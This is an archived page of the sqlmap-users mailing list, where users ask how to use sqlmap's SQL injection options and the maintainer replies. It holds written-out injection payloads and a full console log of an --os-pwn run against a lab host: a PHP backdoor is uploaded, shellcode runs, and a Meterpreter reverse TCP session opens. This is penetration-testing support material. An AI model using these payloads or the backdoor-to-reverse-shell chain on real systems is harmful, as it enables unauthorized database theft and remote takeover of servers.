sqlmap-users Mailing List for sqlmap (Page 3)
Brought to you by: inquisb
From: Brandon P. <bpe...@gm...> - 2016-12-04 14:24:30

What command and arguments are you using exactly?

Sent from a phone

> On Dec 4, 2016, at 8:06 AM, Daniele Bianchin <bbi...@gm...> wrote:
>
> Hi!
> I have an issue with sqlmap.
> I created my own fake login in order to test blind SQL injection, but every time I make a test sqlmap says it isn't exploitable.
> I tried to add a suffix, set level to 5, set risk to 3, set the not-string option, but sqlmap still does not work with it.
> The login source is: http://pastebin.com/xzKZJNB1
>
> I tried to inject some payloads manually such as ' OR 1=1#, ' UNION ALL SELECT NULL;NULL #, etc... and they work.
> What should I do?
>
> Thanks in advance!
>
> Daniele.
From: Daniele B. <bbi...@gm...> - 2016-12-04 14:06:09

Hi!

I have an issue with sqlmap.

I created my own fake login in order to test blind SQL injection, but every time I make a test sqlmap says it isn't exploitable.

I tried to add a suffix, set level to 5, set risk to 3, set the not-string option, but sqlmap still does not work with it.

The login source is: http://pastebin.com/xzKZJNB1

I tried to inject some payloads manually such as ' OR 1=1#, ' UNION ALL SELECT NULL;NULL #, etc... and they work.

What should I do?

Thanks in advance!

Daniele.
From: Gary M. <gar...@gm...> - 2016-11-23 10:31:59
From: Ricardo I. d. S. <ri...@gm...> - 2016-08-22 21:54:40

Thanks a lot!

If there is a doc explaining a little about the sqlmap code structure, maybe I can help with this feature. I know a little Python, but in this case I think the biggest problem would be finding the right part of the sqlmap code to include/change.

On Fri, Aug 19, 2016 at 6:19 AM, Miroslav Stampar <mir...@gm...> wrote:
> Currently there is no way. Will implement it when I catch time
> (https://github.com/sqlmapproject/sqlmap/issues/1679).
>
> Bye
>
> --
> Miroslav Stampar
> http://about.me/stamparm
From: Miroslav S. <mir...@gm...> - 2016-08-22 12:14:42

Hi.

One way is a direct approach:

python sqlmap.py -u "http://testphp.vulnweb.com/artists.php?artist=1" --cookie="cid=1" --eval='cid=2' -v 5
...
GET /artists.php?artist=1 HTTP/1.1
Accept-language: en-us,en;q=0.5
Accept-encoding: gzip,deflate
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-agent: sqlmap/1.0.8.20#dev (http://sqlmap.org)
Accept-charset: ISO-8859-15,utf-8;q=0.7,*;q=0.7
Host: testphp.vulnweb.com
Cookie: cid=2
Pragma: no-cache
Cache-control: no-cache,no-store
Connection: close

Bye

On Fri, Aug 19, 2016 at 5:10 PM, Benjamin Vassmer <bva...@gm...> wrote:
> I am trying to run sqlmap against a site that uses single-use URLs. Using the --eval parameter, I am able to run a bash script that creates a fresh cookie for each request, but I cannot seem to find a way to load that cookie with every request.
>
> I have tried the --load-cookies parameter, but it only loads at sqlmap start. Is there a way to direct --load-cookies to a script? Or an alternate way to change the cookie with each request?
>
> Thanks for your (cumulative) knowledge.
>
> Benjamin

--
Miroslav Stampar
http://about.me/stamparm
From: Benjamin V. <bva...@gm...> - 2016-08-19 15:10:46

I am trying to run sqlmap against a site that uses single-use URLs. Using the --eval parameter, I am able to run a bash script that creates a fresh cookie for each request, but I cannot seem to find a way to load that cookie with every request.

I have tried the --load-cookies parameter, but it only loads at sqlmap start. Is there a way to direct --load-cookies to a script? Or an alternate way to change the cookie with each request?

Thanks for your (cumulative) knowledge.

Benjamin
From: Miroslav S. <mir...@gm...> - 2016-08-19 09:19:29

Currently there is no way. Will implement it when I catch time (https://github.com/sqlmapproject/sqlmap/issues/1679).

Bye

On Thu, Aug 18, 2016 at 11:35 PM, Ricardo Iramar dos Santos <ri...@gm...> wrote:
> I checked and Burp's replace feature doesn't have any kind of parameter
> to include an incremental number. :(
> I'll check mitmproxy.

--
Miroslav Stampar
http://about.me/stamparm
From: Ricardo I. d. S. <ri...@gm...> - 2016-08-18 21:35:12

I checked and Burp's replace feature doesn't have any kind of parameter to include an incremental number. :(

I'll check mitmproxy.

On Thu, Aug 18, 2016 at 4:10 PM, Ricardo Iramar dos Santos <ri...@gm...> wrote:
> Great idea!!! Thanks!!! :)
> I'll try and let you know the results.
From: Ricardo I. d. S. <ri...@gm...> - 2016-08-18 19:10:45

Great idea!!! Thanks!!! :)

I'll try and let you know the results.

On Thu, Aug 18, 2016 at 4:07 PM, Brandon Perry <bpe...@gm...> wrote:
> You can write a Burp rule that rewrites a specific value that you set in the SOAP body with an incrementing integer as sqlmap is exploiting the SQL injection (it wouldn't realize the parameter needed to be incremented).
>
> You can use --proxy to send sqlmap through Burp.
From: Brandon P. <bpe...@gm...> - 2016-08-18 19:07:55

You can write a Burp rule that rewrites a specific value that you set in the SOAP body with an incrementing integer as sqlmap is exploiting the SQL injection (it wouldn't realize the parameter needed to be incremented).

You can use --proxy to send sqlmap through Burp.

> On Aug 18, 2016, at 2:02 PM, Ricardo Iramar dos Santos <ri...@gm...> wrote:
>
> I have a SOAP POST request where two different should be unique. One
> is an Email and another UserID.
> Is there a way to inject on Email having the email domain (e.g.
> @gmail.com) as a suffix and increment the UserID parameter (e.g.
> starting from 100)?
>
> Thanks!
> Ricardo Iramar
From: Ricardo I. d. S. <ri...@gm...> - 2016-08-18 19:02:20

I have a SOAP POST request where two different should be unique. One is an Email and another UserID.

Is there a way to inject on Email having the email domain (e.g. @gmail.com) as a suffix and increment the UserID parameter (e.g. starting from 100)?

Thanks!
Ricardo Iramar
From: Miroslav S. <mir...@gm...> - 2016-08-05 08:02:50

Is there any specific question that is preceding? Currently there is no way to declare explicitly what you want.

Bye

On Aug 4, 2016 03:25, "Indra Zulkarnain" <net...@gm...> wrote:
> hi guys
>
> is there a way to abort the SQLi attack in sqlmap after the third error
>
> I used to keep sqlmap running on the server to dump the database when the vuln
> is time-based SQLi,
> but I want sqlmap to stop retrying after the third error
>
> thanks
> Indra Z
From: Indra Z. <net...@gm...> - 2016-08-04 10:24:36

hi guys

is there a way to abort the SQLi attack in sqlmap after the third error

I used to keep sqlmap running on the server to dump the database when the vuln is time-based SQLi, but I want sqlmap to stop retrying after the third error

thanks
Indra Z
From: Miroslav S. <mir...@gm...> - 2016-08-01 11:00:24

Hi.

This looks like a false positive. Please rerun with --flush-session.

Kind regards

On Mon, Aug 1, 2016 at 12:57 PM, Niall <jam...@gm...> wrote:
> Hi,
>
> I am using SQLMAP to pen test a web app and it says that a field is
> boolean-based blind vulnerable.
>
> The DB is an OpenEdge Progress DB, so I understand SQLMAP does not support
> this DBMS. However, can I still use it to test whether there is a SQL
> injection vulnerability (and not exploit it) or will it not detect the
> vulnerability at all?
>
> I am not sure whether SQLMAP cannot get any info out of the DB because
> Progress is unsupported or it is a false positive.
>
> Below is SQLMAP output (if I run the exact same query on the DB itself it
> returns data):
>
> sqlmap -u 'http://xxx/login?host=1' --sql-query="select ('role') from pub.role_type" --no-cast --threads=2
> [...]
> [11:53:57] [CRITICAL] previous heuristics detected that the target is
> protected by some kind of WAF/IPS/IDS
> sqlmap resumed the following injection point(s) from stored session:
> ---
> Parameter: host (GET)
>     Type: boolean-based blind
>     Title: AND boolean-based blind - WHERE or HAVING clause
>     Payload: host=1") AND 1239=1239 AND ("UqXp"="UqXp
> ---
> [11:53:57] [INFO] the back-end DBMS is MySQL
> back-end DBMS: MySQL 5 (MariaDB fork)
> [11:53:57] [INFO] fetching SQL SELECT statement query output: 'select ('role') from pub.role_type'
> [11:53:57] [INFO] retrieving the length of query output
> [11:53:57] [INFO] retrieved:
> [11:53:57] [INFO] retrieved:
> select ('role') from pub.role_type: None
> [11:53:58] [INFO] fetched data logged to text files under '/root/.sqlmap/output/'
>
> [*] shutting down at 11:53:58
>
> Thank you for your help.

--
Miroslav Stampar
http://about.me/stamparm
From: Niall <jam...@gm...> - 2016-08-01 10:57:57

Hi,

I am using SQLMAP to pen test a web app and it says that a field is boolean-based blind vulnerable.

The DB is an OpenEdge Progress DB, so I understand SQLMAP does not support this DBMS. However, can I still use it to test whether there is a SQL injection vulnerability (and not exploit it) or will it not detect the vulnerability at all?

I am not sure whether SQLMAP cannot get any info out of the DB because Progress is unsupported or it is a false positive.

Below is SQLMAP output (if I run the exact same query on the DB itself it returns data):

sqlmap -u 'http://xxx/login?host=1' --sql-query="select ('role') from pub.role_type" --no-cast --threads=2
_
___ ___| |_____ ___ ___ {1.0.7.1#dev}
|_ -| . | | | .'| . |
|___|_ |_|_|_|_|__,| _|
|_| |_| http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting at 11:53:57

[11:53:57] [INFO] resuming back-end DBMS 'mysql'
[11:53:57] [INFO] testing connection to the target URL
[11:53:57] [CRITICAL] previous heuristics detected that the target is protected by some kind of WAF/IPS/IDS
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: host (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: host=1") AND 1239=1239 AND ("UqXp"="UqXp
---
[11:53:57] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL 5 (MariaDB fork)
[11:53:57] [INFO] fetching SQL SELECT statement query output: 'select ('role') from pub.role_type'
[11:53:57] [INFO] retrieving the length of query output
[11:53:57] [INFO] retrieved:
[11:53:57] [INFO] retrieved:
select ('role') from pub.role_type: None
[11:53:58] [INFO] fetched data logged to text files under '/root/.sqlmap/output/'

[*] shutting down at 11:53:58

Thank you for your help.
From: armen R. <arm...@ya...> - 2016-04-26 01:50:52

hi bro, I can't run python sqlmap.py on my PC, so please help me now
From: Miroslav S. <mir...@gm...> - 2016-04-23 14:43:55

Changed wiki pages for --string to:

...which should be present on original page (though it is not a requirement)...

Bye

On Sat, Apr 23, 2016 at 4:40 PM, Miroslav Stampar <mir...@gm...> wrote:
> Just checked.
>
> sqlmap only warns that there is no --string in the original response. So, I
> just need to change the wiki pages accordingly.
>
> Bye

--
Miroslav Stampar
http://about.me/stamparm
From: Miroslav S. <mir...@gm...> - 2016-04-23 14:40:30

Just checked.

sqlmap only warns that there is no --string in the original response. So, I just need to change the wiki pages accordingly.

Bye

On Fri, Apr 22, 2016 at 5:43 PM, Miroslav Stampar <mir...@gm...> wrote:
> p.s. "Will check current status now" -> "Will check current status later
> today"

--
Miroslav Stampar
http://about.me/stamparm
From: Miroslav S. <mir...@gm...> - 2016-04-22 15:43:50

p.s. "Will check current status now" -> "Will check current status later today"

On Apr 22, 2016 5:42 PM, "Miroslav Stampar" <mir...@gm...> wrote:
> Ok. This makes way more sense :). Now commuting. Will check current status
> now (will drop checking in original if it is the case now).
>
> Bye
From: Miroslav S. <mir...@gm...> - 2016-04-22 15:42:32

Ok. This makes way more sense :). Now commuting. Will check current status now (will drop checking in original if it is the case now).

Bye

On Apr 22, 2016 5:39 PM, "Tim Maletic" <tma...@gm...> wrote:
> Let me try to put this another way. According to the usage doc:
>
> "Sometimes it may fail, that is why the user can provide a string
> (--string option) which is always present on original page and on all True
> injected query pages, but that it is not on the False ones."
>
> Is there a way to invert this logic so that "--string" works for strings
> that are present on original page and all *true* ones?
From: Tim M. <tma...@gm...> - 2016-04-22 15:39:18

Let me try to put this another way. According to the usage doc:

"Sometimes it may fail, that is why the user can provide a string (--string option) which is always present on original page and on all True injected query pages, but that it is not on the False ones."

Is there a way to invert this logic so that "--string" works for strings that are present on original page and all *true* ones?

On Fri, Apr 22, 2016 at 11:20 AM, Miroslav Stampar <mir...@gm...> wrote:
> This doesn't make any sense. With --string either there is a string (TRUE)
> or there isn't (FALSE). In case of --not-string it's the complete opposite.
>
> You are asking for 4 states: 1) with string and not-string; 2) with string
> and no not-string; 3) without string and with not-string; and 4) without
> string and without not-string
>
> Please reconsider your whole use-case.
>
> Bye
>
> --
> Miroslav Stampar
> http://about.me/stamparm
From: Miroslav S. <mir...@gm...> - 2016-04-22 15:21:03

This doesn't make any sense. With --string either there is a string (TRUE) or there isn't (FALSE). In case of --not-string it's the complete opposite.

You are asking for 4 states: 1) with string and not-string; 2) with string and no not-string; 3) without string and with not-string; and 4) without string and without not-string

Please reconsider your whole use-case.

Bye

On Fri, Apr 22, 2016 at 4:23 PM, Tim Maletic <tma...@gm...> wrote:
> I'm testing a system where no injection and false injections produce page
> A, but true injections produce page B.
>
> sqlmap doesn't support setting both --string and --not-string, and these
> options assume the opposite of the above, so I don't see a way to handle
> this unusual situation.
>
> Suggestions?
> Thanks!
> -tm

--
Miroslav Stampar
http://about.me/stamparm
From: Tim M. <tma...@gm...> - 2016-04-22 14:23:33
|
I'm testing a system where no injection and false injections produce page A, but true injections produce page B.

sqlmap doesn't support setting both --string and --not-string, and these options assume the opposite of the above, so I don't see a way to handle this unusual situation.

Suggestions?
Thanks!
-tm |
From: Miroslav S. <mir...@gm...> - 2016-04-22 07:17:15
|
In your case, the problem is the --tmp-path. Have you manually set it to "/tmp"? If so, it is wrongly set to a Linux path while you should put it to a remote (Windows) location (...--tmp-path=TMPPATH Remote absolute path of temporary files directory)

Bye

--
Miroslav Stampar
http://about.me/stamparm |
From: Miroslav S. <mir...@gm...> - 2016-04-22 07:14:02
|
$ sudo python sqlmap.py -u "http://192.168.146.132/test_environment/mysql/get_int.php?id=1" --os-pwn
[sudo] password for stamparm:

(sqlmap ASCII banner) {1.0.4.21#dev} http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting at 09:11:45

[09:11:45] [WARNING] you did not provide the local path where Metasploit Framework is installed
[09:11:45] [WARNING] sqlmap is going to look for Metasploit Framework installation inside the environment path(s)
[09:11:45] [INFO] Metasploit Framework has been found installed in the '/usr/bin' path
[09:11:45] [INFO] resuming back-end DBMS 'mysql'
[09:11:45] [INFO] testing connection to the target URL
[09:11:45] [INFO] heuristics detected web page charset 'ascii'
[09:11:45] [WARNING] there is a DBMS error found in the HTTP response body which could interfere with the results of the tests
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=1 AND 2546=2546

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
    Payload: id=1 AND (SELECT 8079 FROM(SELECT COUNT(*),CONCAT(0x7178767071,(SELECT (ELT(8079=8079,1))),0x7178767671,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)

    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
    Payload: id=1 AND (SELECT * FROM (SELECT(SLEEP(5)))xlBU)

    Type: UNION query
    Title: Generic UNION query (NULL) - 3 columns
    Payload: id=1 UNION ALL SELECT NULL,NULL,CONCAT(0x7178767071,0x4d456579576479484f6370774b764245666350774a6f544b5a714c6442686644794976654154524a,0x7178767671)-- epjZ
---
[09:11:45] [INFO] the back-end DBMS is MySQL
web server operating system: Windows
web application technology: PHP 5.3.1, Apache 2.2.14
back-end DBMS: MySQL 5.0
[09:11:45] [INFO] fingerprinting the back-end DBMS operating system
[09:11:45] [INFO] the back-end DBMS operating system is Windows
how do you want to establish the tunnel?
[1] TCP: Metasploit Framework (default)
[2] ICMP: icmpsh - ICMP tunneling
>

[09:11:46] [INFO] going to use a web backdoor to establish the tunnel
which web application language does the web server support?
[1] ASP
[2] ASPX
[3] JSP
[4] PHP (default)
>

[09:11:47] [WARNING] unable to retrieve automatically the web server document root
what do you want to use for writable directory?
[1] common location(s) ('C:/xampp/htdocs/, C:/Inetpub/wwwroot/') (default)
[2] custom location(s)
[3] custom directory list file
[4] brute force search
> 1
[09:12:02] [WARNING] unable to automatically parse any web server path
[09:12:02] [INFO] trying to upload the file stager on '/xampp/htdocs/' via LIMIT 'LINES TERMINATED BY' method
[09:12:02] [INFO] the file stager has been successfully uploaded on '/xampp/htdocs/' - http://192.168.146.132:80/tmpuycdj.php
[09:12:02] [INFO] the backdoor has been successfully uploaded on '/xampp/htdocs/' - http://192.168.146.132:80/tmpbqtzu.php
[09:12:02] [INFO] creating Metasploit Framework multi-stage shellcode
which connection type do you want to use?
[1] Reverse TCP: Connect back from the database host to this machine (default)
[2] Reverse TCP: Try to connect back from the database host to this machine, on all ports between the specified and 65535
[3] Reverse HTTP: Connect back from the database host to this machine tunnelling traffic over HTTP
[4] Reverse HTTPS: Connect back from the database host to this machine tunnelling traffic over HTTPS
[5] Bind TCP: Listen on the database host for a connection
>

what is the local address? [Enter for '192.168.146.1' (detected)]
which local port number do you want to use? [59643]
which payload do you want to use?
[1] Meterpreter (default)
[2] Shell
[3] VNC
>

[09:12:04] [INFO] creation in progress ..... done
[09:12:09] [INFO] uploading shellcodeexec to 'C:/Windows/Temp/tmpsehply.exe'
[09:12:09] [INFO] shellcodeexec successfully uploaded
[09:12:09] [INFO] running Metasploit Framework command line interface locally, please wait..

(Metasploit "CYBER MISSILE COMMAND V4" ASCII banner)
http://metasploit.pro

       =[ metasploit v4.11.8-dev-a030179 ]
+ -- --=[ 1527 exploits - 880 auxiliary - 259 post ]
+ -- --=[ 437 payloads - 38 encoders - 8 nops ]
+ -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ]

PAYLOAD => windows/meterpreter/reverse_tcp
EXITFUNC => process
LPORT => 59643
LHOST => 192.168.146.1
[*] Started reverse TCP handler on 192.168.146.1:59643
[*] Starting the payload handler...
[09:12:18] [INFO] running Metasploit Framework shellcode remotely via shellcodeexec, please wait..
[09:12:23] [WARNING] turning off pre-connect mechanism because of connection time out(s)
[*] Sending stage (957487 bytes) to 192.168.146.132

meterpreter >

On Fri, Apr 22, 2016 at 6:56 AM, Indra Zulkarnain <net...@gm...> wrote:
> Hi all,
>
> I'm just wondering: when I tried to do --os-pwn on sqlmap in my "DVWA windows machine"
>
> I got an error
>
> [WARNING] unable to upload the file through the web file stager to '/tmp'
>
> I wonder, is it only available for Linux OS?
>
> thanks
> Indra Z
>
> --
> --from the net with zero space--

--
Miroslav Stampar
http://about.me/stamparm |